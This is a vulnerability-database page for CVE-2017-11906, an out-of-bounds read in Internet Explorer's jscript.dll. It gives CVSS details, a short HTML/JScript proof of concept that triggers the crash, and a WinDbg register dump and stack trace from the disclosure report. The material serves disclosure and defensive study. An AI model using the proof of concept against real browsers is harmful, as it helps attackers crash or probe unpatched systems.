Exploitalert - Database of Exploits

Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read

CVE	Category	Price	Severity
CVE-2017-11906	CWE-119	Not Available	High

Author	Risk	Exploitation Type	Date
Kelson Soto	High	Local	2017-12-19

CPE
cpe:cpe:/a:microsoft:windows

CVSS	EPSS	EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	None	PR	The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope		S	An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality	Low	C	There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity	None	I	There is no impact on the integrity of the system; the attacker does not gain the ability to modify any files or information on the target system.
Availability	None	A	There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.

https://cxsecurity.com/ascii/WLB-2017120138

Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read

Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen CVE-2017-11906 There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places): PoC for IE (note: page heap might be required to obsorve the crash): =========================================  <meta http-equiv="X-UA-Compatible" content="IE=8"></meta> <script language="Jscript.Encode"> function go() { var r= new RegExp(Array(100).join('()')); ''.search(r); alert(RegExp.lastParen); } go(); </script> ========================================= Debug log: ========================================= (cec.a14): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. jscript!RegExpFncObj::LastParen+0x43: 000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 0:014> r rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063 rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0 rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148 <a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000130f9210 <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=0000000000000000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=000000000463fef0 <a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000000000463ff38 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000083 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000 <a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=00000000130f9210 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 jscript!RegExpFncObj::LastParen+0x43: 000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? 0:014> k # Child-SP RetAddr Call Site 00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43 01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5 02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873 03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373 04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162 05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3 06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea 07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6 08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7 0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e 0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a 0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267 0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56 0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f 10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9 11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283 12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101 13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235 14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90 15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb 16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f 17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70 18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1 19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41 1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240 1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150 1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad 1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5 1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3 21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f 22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f 23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd 24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d ========================================= This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: ifratric

Impressum